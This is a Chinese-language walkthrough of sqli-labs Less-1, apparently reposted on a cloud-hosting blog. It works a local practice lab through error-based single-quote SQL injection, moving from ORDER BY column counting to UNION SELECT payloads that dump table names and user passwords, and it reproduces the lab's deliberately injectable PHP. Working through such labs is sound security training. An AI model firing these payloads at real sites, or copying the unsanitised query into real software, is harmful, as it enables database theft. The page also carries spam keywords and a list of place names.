亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

發布時間:2020-04-03 18:30:44 來源:網絡 閱讀:3957 作者:天道酬勤VIP 欄目:MySQL數據庫

首先來到第一關:


http://127.0.0.1/sqli-labs-master/Less-1/


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


用語句 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' 進行測試報錯


可以看到sql語句出錯了。sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


用 and 1 = 1去測試:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  and 1 = 1 %23 回顯正常

%23是“#”注釋

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


用 and 1 = 2 去測試:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  and 1 = 2 %23 回顯示失敗,說明存在注入點。


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


判斷字段:

當order by 3 的時候,回顯正常:

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3 %23

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

當order by 4 的時候,回顯不正常:


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


說明字段是3。

報錯顯示回顯庫:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'  union select 1,2,3 %23

回顯的地方是2和3。

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

用version()看版本:

用database()看當前網站使用的數據庫:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'  union select 1,version(), database() %23

通過下圖可以看到,使用的php版本是5.5.53,該網站使用的數據庫名字是security


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

添加?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23 使用過濾查詢語句where 查看security數據庫內的表

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema = 'security' %23

看到有四個表:


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


查看users表內的列

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23


sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

查看username和password里的內容:

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users %23

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


我們在看到users表里還看到了id,我們看看有多少組賬號密碼

只需要在后面加上 where id = n即可

經過測試 id 最大是14

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users  where id = 1%23

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,username,password from users  where id = 14%23



sqli-labs-master第一關:基于錯誤的GET單引號字符型注入


第一關結束:


第二關很快更新。



聲明:官方源碼被我改動了。附上我改動的php代碼:

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
echo $sql;
echo "<br>";
if($row)
{
 	echo "<font size='5' color= '#99FF00'>";
 	echo 'Your Login name:'. $row['username'];
 	echo "<br>";
 	echo 'Your Password:' .$row['password'];
 	echo "</font>";
 	}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

微信公眾號:

sqli-labs-master第一關:基于錯誤的GET單引號字符型注入

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

关岭| 革吉县| 甘孜县| 资中县| 个旧市| 南郑县| 西和县| 赫章县| 夹江县| 仙游县| 通州市| 得荣县| 盐城市| 四平市| 嘉峪关市| 濮阳县| 通辽市| 松潘县| 朔州市| 泸水县| 库尔勒市| 宁南县| 合水县| 临邑县| 玉林市| 德钦县| 铜川市| 尉犁县| 西丰县| 公主岭市| 沙洋县| 义马市| 广丰县| 营山县| 东山县| 铁岭县| 鄯善县| 四会市| 林甸县| 江孜县| 兴国县|